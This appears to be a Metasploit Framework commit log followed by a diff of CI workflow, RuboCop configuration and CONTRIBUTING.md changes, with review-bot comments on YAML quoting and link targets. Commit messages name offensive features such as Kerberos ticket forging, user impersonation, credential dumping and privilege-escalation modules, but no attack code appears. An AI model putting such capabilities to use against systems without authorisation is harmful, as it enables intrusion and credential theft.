Dean Welch cf332a2b20 Move DEBUG_TICKET action from forge ticket to its own module inspect_ticket 2022-12-15 13:42:30 +00:00
Ashley Donaldson 28bd03f971 Apply suggestions from code review
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2022-12-15 14:50:10 +11:00
Ashley Donaldson 57152fdd5f Use framework's thread mechanism for background keepalive worker 2022-12-15 14:44:57 +11:00
Jack Heysel f015d1425a Added update to common.h 2022-12-14 20:39:31 -05:00
dwelch-r7 243b9da3e6 Land #17344, Update windows_secrets_dump and Keytab module to export kerberos keys 2022-12-14 15:03:15 +00:00
adfoster-r7 2783e92203 Update windows_secrets_dump and Keytab module to export kerberos keys 2022-12-14 13:40:39 +00:00
adfoster-r7 abcf4606a8 Land #17360, document the kerberos forge_ticket DEBUG_TICKET action 2022-12-14 13:37:34 +00:00
cgranleese-r7 7face44638 Land #17379, Merge 6.2.31 into kerberos feature branch 2022-12-14 13:34:36 +00:00
adfoster-r7 28bd37b0a7 Update rasn1 dependency for pkinit 2022-12-14 00:32:26 +00:00
adfoster-r7 a9ccfe31b7 Merge branch 'upstream-master' into merge-msf-6.2.31-into-kerberos-feature-branch 2022-12-13 19:40:39 +00:00
dwelch-r7 fd555b218f Land #17373, Add ticket flags when outputting krb5 ccache 2022-12-13 12:46:25 +00:00
adfoster-r7 7625d4b08b Add ticket flags when outputting krb5 ccache 2022-12-13 12:19:16 +00:00
Jack Heysel 2fa7e7b2d5 Lenovo Diagnostics Driver Privilege Escalation (CVE-2022-3699) 2022-12-12 21:53:53 -05:00
Spencer McIntyre a80db73bab Land #17325, add impersonation for get_ticket
Enable the `get_ticket` module to impersonate a user with S4U2self and S4U2proxy
2022-12-12 09:10:37 -05:00
Dean Welch 4aaf540364 Add modules docs for TICKET_DEBUG 2022-12-12 13:39:09 +00:00
Christophe De La Fuente 86ec66c43d Add decoding support
- for Rex::Proto::Kerberos::Model::Checksum
- for Rex::Proto::Kerberos::Model::PreAuthForUser
- add specs
2022-12-12 12:56:30 +01:00
npm-cesium137-io 6eaa0bfab2 Add veeam_credential_dump post module
Post module for Veeam Backup and Replication / Veeam ONE Monitor Server
credential extract
2022-12-10 16:21:59 -05:00
adfoster-r7 46f7fc9288 Land #17313, PAC Bindata Model + print ccache contents 2022-12-08 14:38:38 +00:00
Dean Welch fc3bb585be Move TypeSerialization1 to its own file 2022-12-08 13:20:41 +00:00
Dean Welch 1e1580e346 Move TypeSerialization1 to its own file 2022-12-08 13:11:47 +00:00
Heyder Andrade cf6d5d3a14 Made the gadgets being used more readable 2022-12-06 17:47:49 +01:00
Dean Welch d239e9b007 Don't autoload krb5Pac 2022-12-06 13:01:47 +00:00
Dean Welch 1e2ada3cce Add options validation depending on action in forge_ticket.rb 2022-12-06 12:55:42 +00:00
Dean Welch 405271a52f Add pac BinData Model 2022-12-05 14:03:21 +00:00
Heyder Andrade 8aca86b816 Apply suggestions from code review 2022-12-04 17:29:05 +01:00
Heyder Andrade 5c3ac339d0 Apply suggestions from code review
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2022-12-04 12:13:50 +01:00
Christophe De La Fuente c6f8bae1ab Fix from code review and updates the KrbUseCachedCredentials logic 2022-12-02 15:28:08 +01:00
Christophe De La Fuente 69e08094cd Update documentation 2022-12-01 21:23:25 +01:00
Christophe De La Fuente cc61a26668 Add S4U2Self and S4U2Proxy support to impersonate a user 2022-12-01 20:42:13 +01:00
Ashley Donaldson 2d397d37db Removed warning that I think was actually just a bug - now fixed 2022-11-30 13:14:19 +11:00
Ashley Donaldson 0323d45737 More correct approach to encoding for command line 2022-11-30 11:54:42 +11:00
Ashley Donaldson 5fce80ed1d Added comments to most functions 2022-11-30 11:53:57 +11:00
Ashley Donaldson 3a93fcb404 Rubocop'd 2022-11-30 11:32:23 +11:00
Ashley Donaldson 97aef31180 Removed vestigial code while we're at it 2022-11-30 11:31:27 +11:00
Ashley Donaldson 1231eefe55 Fixed WQL module while I'm at it 2022-11-30 10:26:19 +11:00
Ashley Donaldson 0d68ec5d1b Fix formatting of winrm_script_exec 2022-11-30 07:48:30 +11:00
Ashley Donaldson 6a040e2ee5 #11456 Winrm Script Exec works again 2022-11-30 07:39:38 +11:00
Spencer McIntyre 013679d475 Land #17311, Add Kerberos pkinit error codes 2022-11-29 13:19:03 -05:00
Spencer McIntyre 2daf11d521 Land #17309, Fix Kerberos get ticket module
Fix crash in kerberos get ticket module
2022-11-29 13:17:16 -05:00
Heyder Andrade 704cee436b Apply suggestions from code review 2022-11-29 15:25:14 +01:00
Heyder Andrade c1236500f1 Apply suggestions from code review
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-11-29 14:12:39 +01:00
adfoster-r7 750192afa4 Add pkinit error codes 2022-11-29 10:36:10 +00:00
adfoster-r7 34d1b5b37e Fix crash in kerberos get ticket module 2022-11-29 10:17:21 +00:00
adfoster-r7 a12090c566 Land #17308, Fix the DH key construction for OpenSSL3 2022-11-28 21:03:52 +00:00
Spencer McIntyre cd828a82c8 Fix the DH key construction for OpenSSL3 2022-11-28 14:54:10 -05:00
Spencer McIntyre abe0549db6 Land #17226, Module to request TGT/TGS tickets
Module to request TGT/TGS Kerberos tickets from the KDC
2022-11-28 11:59:17 -05:00
Heyder Andrade ff63f0aa32 Added reference 2022-11-28 14:11:07 +01:00
Heyder Andrade 27f8f4fc47 Cleanup 2022-11-23 01:55:06 +01:00
Heyder Andrade 7880530989 The check method should report when finding a vulnerable product.
I think all exploit modules should "report" in the check method when finding a vulnerable
product. By doing that we can take advantage of all check methods in the exploit module
and use them as a "scanner". That would give the chance for the user to check multiple
targets simultaneously and save the result for further actions.
2022-11-23 01:29:38 +01:00
Heyder Andrade 0e5f8d49f9 Code cleanup and payload generation improvements 2022-11-23 00:29:10 +01:00
Heyder Andrade 13a3d9d1ca Added documentation 2022-11-23 00:19:25 +01:00
Heyder Andrade 7983c14166 Removed a bunch of hard-coded stuff and cleaned out fake smart server 2022-11-22 12:07:55 +01:00
Heyder Andrade 3d73f574d4 Improve error handling 2022-11-20 12:10:04 +01:00
Heyder Andrade a05cbdbc30 Improve error handling 2022-11-20 12:09:05 +01:00
Heyder Andrade c9eaa9af37 Added module for #CVE-2022-2992 2022-11-19 15:21:31 +01:00
Heyder Andrade 34d191b06c Added Ruby serialized payload generator 2022-11-19 15:20:49 +01:00
Heyder Andrade f1b97de78d Added Gitlab mixin 2022-11-19 15:19:29 +01:00
Christophe De La Fuente 0c05e82868 Land #17240, Update icpr_cert for requesting certs on behalf of users 2022-11-18 11:58:56 +01:00
Christophe De La Fuente 5280580c08 Fixes from code review 2022-11-18 11:02:32 +01:00
Spencer McIntyre 41f9ba57b4 Add icpr_cert module specs 2022-11-17 12:12:35 -05:00
Spencer McIntyre b2f6f0c792 Update the module docs for ESC2 and ESC3 2022-11-17 12:12:35 -05:00
Spencer McIntyre f4a65a220a Support ON_BEHALF_OF in icpr_cert
Add the code necessary to request certificates on behalf of other users.
This is necessary to exploit templates vulnerable to ESC2 and ESC3.
2022-11-17 12:12:35 -05:00
Spencer McIntyre 054878242a Update ruby_smb gem to 3.2.1 2022-11-17 12:12:35 -05:00
Ron Bowes 93cba95170 Add URLs 2022-11-16 12:23:47 -08:00
Ron Bowes 6a8b94ee42 Merge branch 'f5-post-modules' into f5-createuser-privesc 2022-11-16 12:23:02 -08:00
Ron Bowes fc579fe3f4 Add a privesc module for F5, using the MCP protocol 2022-11-16 12:12:16 -08:00
adfoster-r7 8efc6c5304 Land #17103, Consolidate KdcOptionFlags and TicketFlags 2022-11-09 17:27:17 +00:00
Dean Welch 7c2134d941 Consolidate KdcOptionFlags and TicketFlags 2022-11-09 17:08:26 +00:00
adfoster-r7 65f6aaca82 Land #17077, Add support for AES keys for silver/golden ticket forging 2022-11-09 16:51:11 +00:00
Dean Welch 23ff829e52 Add support for AES keys for silver/golden ticket forging 2022-11-09 13:01:13 +00:00
Christophe De La Fuente 37fd441b0f Land #17117, Authenticate to Kerberos with PKINIT 2022-11-08 18:54:03 +01:00
Spencer McIntyre e70861fc87 Land #17239, Fix broken kerberos login module 2022-11-08 11:21:17 -05:00
adfoster-r7 30fe07801b Fix broken kerberos login module 2022-11-08 15:49:21 +00:00
adfoster-r7 4c4762a84c Land #17045, Add module for converting kerberos ticket formats 2022-11-07 23:54:44 +00:00
Christophe De La Fuente 946eb1e546 Add documentation 2022-11-07 20:19:43 +01:00
Dean Welch ee46d18505 Add yard docs and address review comments 2022-11-07 12:10:01 +00:00
Dean Welch a110465fe4 Add module for converting kerberos ticket formats 2022-11-07 12:10:01 +00:00
Christophe De La Fuente eb051ec9a7 Add get_ticket module 2022-11-04 18:46:47 +01:00
Spencer McIntyre c6a1146314 Upgrade from RASN1 v0.10.0 to v0.11.0
This upgrades the RASN1 library to the latest as of today and fixes
compatibility issues. The issue introduced by v0.11 was that types are
initialized with an `options` hash, which the Name class was not set to
accept.
2022-11-03 12:22:16 -04:00
Spencer McIntyre 6e453a3f4f Fix a bug in #extract_user_and_realm
While iterating over asn_san_seq, if the tag doesn't match either of the
two conditions, user and domain will be nil which leads to a problem
later on.
2022-11-03 10:51:52 -04:00
Spencer McIntyre e00cab3f11 Land #17084, Add Kerberos keytab module 2022-11-02 12:01:03 -04:00
adfoster-r7 e647bf8620 Namespace krb5 models 2022-11-02 13:04:52 +00:00
adfoster-r7 1307f01b76 Align with keytab instead of key_tab 2022-11-02 13:04:51 +00:00
adfoster-r7 98d2633859 Add Kerberos ktutil module 2022-11-02 13:04:50 +00:00
cgranleese-r7 725a3d50c7 Land #17208, Merge 6.2.25 master into kerberos feature branch 2022-11-02 12:52:19 +00:00
adfoster-r7 7774b7ddcf Merge remote-tracking branch 'upstream/master' into merge-6.2.25-master-into-kerberos-feature-branch 2022-10-31 23:15:11 +00:00
Spencer McIntyre b6d46fbf5d Land #17175, kerberos support in smb_login 2022-10-28 13:58:18 -04:00
Spencer McIntyre edf211e374 Set proof to the Kerberos error 2022-10-28 13:55:44 -04:00
Christophe De La Fuente 4ec7eea436 Fixes from code review 2022-10-28 15:33:34 +02:00
Christophe De La Fuente f1639797b9 Rubocop updates 2022-10-21 17:17:06 +02:00
Christophe De La Fuente 52904b8cb6 Add support for Kerberos
- Add kerberos authenticator to `scanner/smb/smb_login` and the
  corresponding login scanner library
- Add new options: `UseCachedCredentials` and `StoreCredentialCache`
- Add `use_cached_credentials` attribute to
  Kerberos::ServiceAuthenticator::Base. This enables/disables the use of
  cached Kerberos credentials from the database.
- Add `store_credential_cache` attribute to
  Kerberos::ServiceAuthenticator::Base. This enables/disables storing
  Kerberos TGS MIT Credential Cache to the database.
2022-10-21 16:16:10 +02:00
Ashley Donaldson 16a547d9ed Moved all PKINIT structures into the one file 2022-10-17 18:34:30 +11:00
Ashley Donaldson 09e740d48d Changes from code review 2022-10-17 17:19:50 +11:00
Ashley Donaldson c7bab60a3e Fix to support DNS entries in certificate files 2022-10-07 15:17:07 +11:00
Ashley Donaldson aa98c9d004 Removed vestigial test 2022-10-07 14:29:20 +11:00
Ashley Donaldson 80bb1867bc Added documentation for the module 2022-10-07 14:24:37 +11:00
Ashley Donaldson db12c7e0f0 Added tests for parsing new Kerberos structures 2022-10-07 14:04:24 +11:00
Ashley Donaldson 793a05f9f3 Added comments for new functions 2022-10-07 11:55:47 +11:00
Ashley Donaldson b5a076a1f1 Neaten parameter and error handling 2022-10-07 11:24:39 +11:00
Ashley Donaldson 063a768959 Store ccache 2022-10-07 09:56:11 +11:00
Ashley Donaldson 58c30f10aa Send and Receive PKINIT responses 2022-10-07 01:04:10 +11:00
adfoster-r7 e2ce631709 Land #17019, Update CCache Reuse for TGTs (and Golden Tickets) 2022-10-05 11:40:25 +01:00
Spencer McIntyre 5d88a28fa4 Update YARD docs for TGT reuse 2022-10-03 09:04:30 -04:00
Spencer McIntyre 421121736d Load and use cached TGTs 2022-09-30 13:23:52 -04:00
Spencer McIntyre a619303f2c Save tickets in a compatible way for retrieval 2022-09-30 13:23:52 -04:00
Spencer McIntyre acbe644588 Document some of the parameter types 2022-09-30 13:23:52 -04:00
Spencer McIntyre 82912aad38 Support delegation from stored TGTs 2022-09-30 13:23:52 -04:00
Spencer McIntyre 081d66330b Add a constructor method for Krb5Ccache 2022-09-30 13:23:52 -04:00
Spencer McIntyre 89c3792886 Allow authenticating with stored TGTs 2022-09-30 13:23:52 -04:00
Spencer McIntyre 6bd9de43d6 Add the #request_service_ticket method 2022-09-30 13:23:52 -04:00
Spencer McIntyre c89d0a7b02 Land #17079, Merge latest master
Merge latest master into Kerberos feature branch
2022-09-29 13:10:06 -04:00
adfoster-r7 5d345e6689 Merge branch 'upstream-master' into feature-kerberos-authentication 2022-09-29 16:42:58 +01:00
adfoster-r7 6cd2c6a82d Land #17025, Allow user_id to be configurable in ticket forging 2022-09-27 13:53:36 +01:00
cgranleese-r7 50685161ef Allow user_id to be configurable in ticket forging 2022-09-22 14:18:17 +01:00
Spencer McIntyre 3e65ba49ef Land #16976, Add documentation for ticket forging
Add documentation for kerberos ticket forging
2022-09-15 09:02:40 -04:00
Spencer McIntyre c5c4cc0ebb Fix a small doc typo left over from the rename 2022-09-15 08:58:16 -04:00
adfoster-r7 3891413f92 Update documentation 2022-09-14 17:20:57 +01:00
adfoster-r7 edef4022cd Add documentation for kerberos ticket forging 2022-09-02 16:36:40 +01:00
adfoster-r7 e4c9721a32 Land #16707, Add Silver and Golden ticket forging module 2022-09-02 11:29:36 +01:00
dwelch-r7 5f85175f56 Add module for golden/silver ticket forging 2022-09-01 16:12:07 +01:00
Christophe De La Fuente 223f21b114 Land #16770, Kerberos CCache File Reuse 2022-08-18 19:18:27 +02:00
Spencer McIntyre 596fae611f Fix an issue caused by a missing renew_till field
When #renew_till is nil, the encoding will fail. This should be encoded
as 0 in this case.
2022-08-18 11:35:39 -04:00
Spencer McIntyre 009ada3cc4 Fix issues from the rebase 2022-08-18 11:35:29 -04:00
Spencer McIntyre 7da5f2ad4a Changes from PR feedback 2022-07-28 16:05:22 -04:00
Spencer McIntyre 1ed064c1ea Log when a cached credential is used 2022-07-28 16:03:24 -04:00
Spencer McIntyre 52e84fa328 Add explicit ticket support for WinRM modules 2022-07-28 16:03:24 -04:00
Spencer McIntyre 942259d44b Add logging for why credentials are filtered 2022-07-28 16:03:24 -04:00
Spencer McIntyre 95d8b7005e Allow reusing cached and explicit CCACHE files 2022-07-28 16:03:22 -04:00
adfoster-r7 93ad8ae232 Land #16760, Send delegated credentials using WinRM 2022-07-27 17:08:29 +01:00
Ashley Donaldson f16e2cfb35 Send TGT to WinRM to allow further access of network resources (kerberos double hop) 2022-07-27 16:19:09 +01:00
Spencer McIntyre 1e903807bb Land #16730, Add mssql Kerberos auth support 2022-07-15 15:00:14 -04:00
adfoster-r7 37f7c15b1e Update mssql login module to support kerberos authentication 2022-07-15 17:33:54 +01:00
adfoster-r7 f2ff7bb913 Add mssql kerberos authentication 2022-07-15 17:26:10 +01:00
adfoster-r7 9579e355c1 Land #16749, Add winrm kerberos authentication support 2022-07-15 16:24:36 +01:00
adfoster-r7 f404fd9abe Land #16700, LDAP Kerberos and NTLM authentication 2022-07-11 13:27:55 +01:00
Ashley Donaldson 39f90d95b1 Create sessions for winrm_login successes.
Reuses the connection, so that authentication doesn't need to happen again
2022-07-08 16:57:09 +10:00
Ashley Donaldson d3e7152954 Changes from code review 2022-07-08 11:47:54 +10:00
Spencer McIntyre ade10650a8 Set the NTLM flags for LDAP authentication
The sign and seal flags need to be removed for LDAP. Because sign and
seal are not set, key56 and key128 can also be removed.

The rest of the flags are taken from
https://github.com/rapid7/ruby_smb/blob/cc5228730f9bc39215322ab6e07fd8da33602bb9/lib/ruby_smb/ntlm.rb#L31
2022-07-07 13:20:34 -04:00
Ashley Donaldson f9f3be3644 Fix unit tests 2022-07-07 18:04:22 +10:00
Ashley Donaldson b2eb348d94 Added WinRM using Kerberos, including encryption 2022-07-07 13:17:09 +10:00
Spencer McIntyre b8ca08d3ce Support NTLM and kerberos auth in LDAP 2022-07-06 17:12:27 -04:00
Spencer McIntyre cfc24b3625 Land #16670, Add initial smb kerberos auth support 2022-07-06 15:48:56 -04:00
Spencer McIntyre 4abef7d373 Remove an unused option and require SmbRhostname 2022-07-06 15:16:50 -04:00
Spencer McIntyre e53bccae85 Set the session key for older SMB dialects too 2022-07-06 15:16:40 -04:00
adfoster-r7 aea37f7137 Add initial SMB Kerberos authentication support 2022-07-06 16:15:33 +01:00
adfoster-r7 5a6adf7c01 Land #16719, Updated CCache Data Module 2022-07-04 17:52:04 +01:00
Spencer McIntyre d31ffa27d3 Add and use a new kerberos CCache model definition 2022-07-01 11:57:30 -04:00
Spencer McIntyre 8c3d7ff42f Rename Thrift related definitions
These definitions are only used by one exploit. BinData registers the
class name globally meaning that the Header and Data types were being
defined here which conflicted with those needed for Kerberos.
2022-07-01 11:56:55 -04:00
adfoster-r7 e40e835fd8 Land #16706, Kerberos login enhancements 2022-06-30 14:51:30 +01:00
adfoster-r7 f508341155 Land #16705, Fix bugs in previous etypes work 2022-06-29 18:11:25 +01:00
Ashley Donaldson 4f650e7c93 Rename parameter 2022-06-28 08:12:56 +10:00
Ashley Donaldson 997f9b92d9 Changes from code review 2022-06-24 09:33:57 +10:00
Ashley Donaldson 96046f9aec Remove unnecessary freeze calls
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2022-06-24 08:36:44 +10:00
Ashley Donaldson 2cce4ac1c1 Fix unit tests 2022-06-23 16:55:30 +10:00
Ashley Donaldson bcd30b9be8 Don't error if it's not 12, as this can occur on older systems 2022-06-23 11:52:55 +10:00
Ashley Donaldson 2553bae018 Report correct password when clock is wrong or password has expired 2022-06-23 11:33:45 +10:00
Ashley Donaldson 3e33e2694d Include information on whether account is disabled or locked.
We can do this more precisely for Windows' implementation of Kerberos
by using the undocumented PA-PW-SALT entry.
2022-06-23 10:46:25 +10:00
Ashley Donaldson 8d1d2d5aad Fix bugs from #16685 2022-06-23 10:20:59 +10:00
adfoster-r7 89187c1fa9 Land #16685, Add missing Kerberos encryption types 2022-06-22 13:13:30 +01:00
dwelch-r7 e672fad870 Land #16689, Update Kerberos to support host addresses in tickets 2022-06-22 12:52:17 +01:00
Ashley Donaldson a4a0fc3028 Changes from code review.
Use kwargs instead of default values for rarer crypto args.
Revert case-sensitivity change; we'll leave krb5 on Linux til later.
More constants
2022-06-22 16:03:36 +10:00
Ashley Donaldson 15446fd173 Incorporated new encryption methods into login scanner, including negotiating 2022-06-22 09:36:25 +10:00
Ashley Donaldson 19b62a5af6 Support several new encryption types for Kerberos.
Supports DES-CBC-MD5, DES3-CBC-SHA1, AES128, AES256
2022-06-22 09:13:33 +10:00
dwelch-r7 81a37ecf88 Land #16625, Add Kerberos LoginScanner support 2022-06-20 17:14:52 +01:00
adfoster-r7 f8901a8b17 Add Kerberos LoginScanner support 2022-06-20 16:38:32 +01:00
adfoster-r7 3f56f9891d Update kerberos to support host addresses in tickets 2022-06-18 04:16:36 +01:00
dwelch-r7 ac5a885f16 Land #16660, Fix Kerberos flags decoding logic 2022-06-17 17:38:09 +01:00
dwelch-r7 3ce8b2e3bc Land #16678, Support decoding pa_data as part of kdc enc response 2022-06-17 17:19:45 +01:00
adfoster-r7 5dd650fc76 Support decoding pa_data as part of kdc enc response 2022-06-15 20:46:45 +01:00
adfoster-r7 affc5bc294 Fix Kerberos flags decoding logic 2022-06-09 12:22:20 +01:00
Grant Willcox 34de5cf5e6 Land PR #16658 - Move kerberos tests to be under the remote folder
Move Kerberos tests to be under the remote folder to match the actual location of the respective library files in Metasploit Framework.
2022-06-08 11:01:05 -05:00
adfoster-r7 f1e5376414 Move kerberos tests to be under the remote folder 2022-06-08 03:21:25 +01:00
1120 changed files with 63014 additions and 28202 deletions
+2 -2
@@ -38,7 +38,7 @@ jobs:
fail-fast: true
matrix:
ruby:
- 2.7
- '2.7'
name: Ruby ${{ matrix.ruby }}
steps:
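Review bot: quoting the matrix entry as `'2.7'` is the right fix for the version list: YAML parses an unquoted `2.7` as a float, and the same treatment would turn a future `3.0` into `3` or `3.10` into `3.1` before `setup-ruby` ever sees it, so every entry added to this matrix later should be quoted the same way.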
@@ -48,7 +48,7 @@ jobs:
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
working-directory: docs
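Review bot: the extra quotes in `ruby-version: '${{ matrix.ruby }}'` are redundant once the matrix entries themselves are strings, because action inputs are always passed as text after expression substitution; the change is harmless, but keeping the quoting on the matrix side only would make the intent (version values are strings) visible in one place.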
+1 -1
@@ -59,7 +59,7 @@ jobs:
comment: `
Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
- [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
- [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
- [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
- [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
`
+2 -2
@@ -35,7 +35,7 @@ jobs:
fail-fast: true
matrix:
ruby:
- 2.7
- '2.7'
name: Lint msftidy
steps:
@@ -51,7 +51,7 @@ jobs:
- uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
env:
BUNDLE_WITHOUT: "coverage development pcap"
+1
@@ -67,6 +67,7 @@ jobs:
- '2.7'
- '3.0'
- '3.1'
- '3.2'
os:
- ubuntu-20.04
- ubuntu-latest
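Review bot: adding `'3.2'` to the `ruby` matrix is only meaningful if the locked gems build and load on Ruby 3.2; the Gemfile.lock changes in this same range bump `rubocop` to 1.44.1 with `parser (>= 3.2.0.0)` and `nokogiri` to 1.14.1, which is what makes the new row viable, so the matrix entry and those lockfile bumps should land together rather than be split across separate PRs.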
+201
@@ -217,6 +217,10 @@ Style/FrozenStringLiteralComment:
Enabled: false
Description: 'We cannot support this yet without a lot of things breaking'
Style/MutableConstant:
Enabled: false
Description: 'We cannot support this yet without a lot of things breaking'
Style/RedundantReturn:
Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
Enabled: false
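Review bot: the `Description` under the new `Style/MutableConstant` entry is copied verbatim from `Style/FrozenStringLiteralComment` two entries above; a cop-specific reason would tell a future reader when it becomes safe to re-enable the rule, since the two cops fail for different reasons (frozen string literals versus constants that are mutated after definition).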
@@ -253,6 +257,18 @@ Style/NumericPredicate:
Description: 'This adds no efficiency nor space saving'
Enabled: false
Style/EvenOdd:
Description: 'This adds no efficiency nor space saving'
Enabled: false
Style/FloatDivision:
Description: 'Not a safe rule to run on Metasploit without manual verification as the right hand side may be a string'
Enabled: false
Style/FormatString:
Description: 'Not a safe rule to run on Metasploit without manual verification that the format is not redefined/shadowed'
Enabled: false
Style/Documentation:
Enabled: true
Description: 'Most Metasploit modules do not have class documentation.'
@@ -350,6 +366,191 @@ Naming/MethodParameterName:
Description: 'Whoever made this requirement never looked at crypto methods, IV'
MinNameLength: 2
Naming/PredicateName:
Enabled: true
# Current methods that break the rule, so that we don't add additional methods that break the convention
AllowedMethods:
- has_additional_info?
- has_advanced_options?
- has_auth
- has_auto_target?
- has_bad_activex?
- has_badchars?
- has_chars?
- has_check?
- has_command?
- has_content_type_extension?
- has_datastore_cred?
- has_evasion_options?
- has_fatal_errors?
- has_fields
- has_files?
- has_flag?
- has_function_name?
- has_gcc?
- has_h2_headings
- has_input_name?
- has_j_security_check?
- has_key?
- has_match?
- has_module
- has_object_ref
- has_objects_list
- has_options?
- has_page?
- has_passphrase?
- has_pid?
- has_pkt_line_data?
- has_prereqs?
- has_privacy_waiver?
- has_privates?
- has_protected_mode_prompt?
- has_proxy?
- has_read_data?
- has_ref?
- has_required_args
- has_required_module_options?
- has_requirements
- has_rop?
- has_s_flag?
- has_service_cred?
- has_subscriber?
- has_subtree?
- has_text
- has_tlv?
- has_u_flag?
- has_users?
- has_vuln?
- has_waiver?
- have_auth_error?
- have_powershell?
- is_accessible?
- is_admin?
- is_alive?
- is_alpha_web_server?
- is_android?
- is_app_binom3?
- is_app_carlogavazzi?
- is_app_cnpilot?
- is_app_epaduo?
- is_app_epmp1000?
- is_app_infovista?
- is_app_ironport?
- is_app_metweblog?
- is_app_oilom?
- is_app_openmind?
- is_app_popad?
- is_app_radware?
- is_app_rfreader?
- is_app_sentry?
- is_app_sevone?
- is_app_splunk?
- is_app_ssl_vpn?
- is_array_type?
- is_auth_required?
- is_author_blacklisted?
- is_badchar
- is_base64?
- is_bind?
- is_cached_size_accurate?
- is_cgi_enabled?
- is_cgi_exploitable?
- is_check_interesting?
- is_child_of?
- is_clr_enabled
- is_connect?
- is_dlink?
- is_dn?
- is_dynamic?
- is_error_code
- is_exception?
- is_exploit_module?
- is_exploitable?
- is_fqdn?
- is_glob?
- is_groupwise?
- is_guest_mode_enabled?
- is_hash_from_empty_pwd?
- is_high_integrity?
- is_hostname?
- is_ie?
- is_imc?
- is_imc_som?
- is_in_admin_group?
- is_interface?
- is_ip_targeted?
- is_key_wanted?
- is_leaf?
- is_local?
- is_logged_in?
- is_loggedin
- is_loopback_address?
- is_mac?
- is_match
- is_md5_format?
- is_module_arch?
- is_module_platform?
- is_module_wanted?
- is_multi_platform_exploit?
- is_not_null?
- is_null_pointer
- is_null_pointer?
- is_num?
- is_num_type?
- is_numeric
- is_online?
- is_parseable
- is_pass_ntlm_hash?
- is_passwd_method?
- is_password_required?
- is_payload_compatible?
- is_payload_platform_compatible?
- is_pointer_type?
- is_pri_key?
- is_proficy?
- is_rdp_up
- is_remote_exploit?
- is_resource_taken?
- is_rf?
- is_rmi?
- is_root?
- is_routable?
- is_running?
- is_scan_complete
- is_secure_admin_disabled?
- is_session_type?
- is_signature_correct?
- is_single_object?
- is_struct_type?
- is_supermicro?
- is_superuser?
- is_sws?
- is_system?
- is_system_user?
- is_target?
- is_target_suitable?
- is_trial_enabled?
- is_trustworthy
- is_uac_enabled?
- is_url_alive
- is_usable?
- is_uuid?
- is_valid?
- is_valid_bus?
- is_valid_snmp_value
- is_value_wanted?
- is_version_compat?
- is_version_tested?
- is_vmware?
- is_vul
- is_vulnerable?
- is_warbird?
- is_windows?
- is_writable
- is_writable?
- is_x86?
- is_zigbee_hwbridge_session?
# %q() is super useful for long strings split over multiple lines and
# is very common in module constructors for things like descriptions
Style/RedundantPercentQ:
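Review bot: `AllowedMethods` matches by bare method name, so a brand-new class that defines `is_admin?` or `has_auth` anywhere in the tree also slips past `Naming/PredicateName`; the comment says the intent is to stop new violations, but this list only stops new names. It also freezes several inconsistent pairs (`is_null_pointer` / `is_null_pointer?`, `is_writable` / `is_writable?`, `has_fields` / `has_files?`), which suggests the list should carry a TODO to be worked down over time rather than be treated as permanent configuration.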
+5 -5
@@ -1,6 +1,6 @@
# Contributing to Metasploit
Thank you for your interest in making Metasploit -- and therefore, the
world -- a better place! Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved.
world -- a better place! Before you get started, please review our [Code of Conduct](./CODE_OF_CONDUCT.md). This helps us ensure our community is positive and supportive for everyone involved.
## Code Free Contributions
Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
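Review bot: the Code of Conduct link on the changed line now points at the relative `./CODE_OF_CONDUCT.md`, while the `[Code of Conduct]` reference definition later in this same file is changed to `https://docs.metasploit.com/docs/code-of-conduct.html`; both resolve, but the document should pick one target so the two links cannot drift apart when either page moves.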
@@ -15,9 +15,9 @@ Before we get into the details of contributing code, you should know there are m
## Code Contributions
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
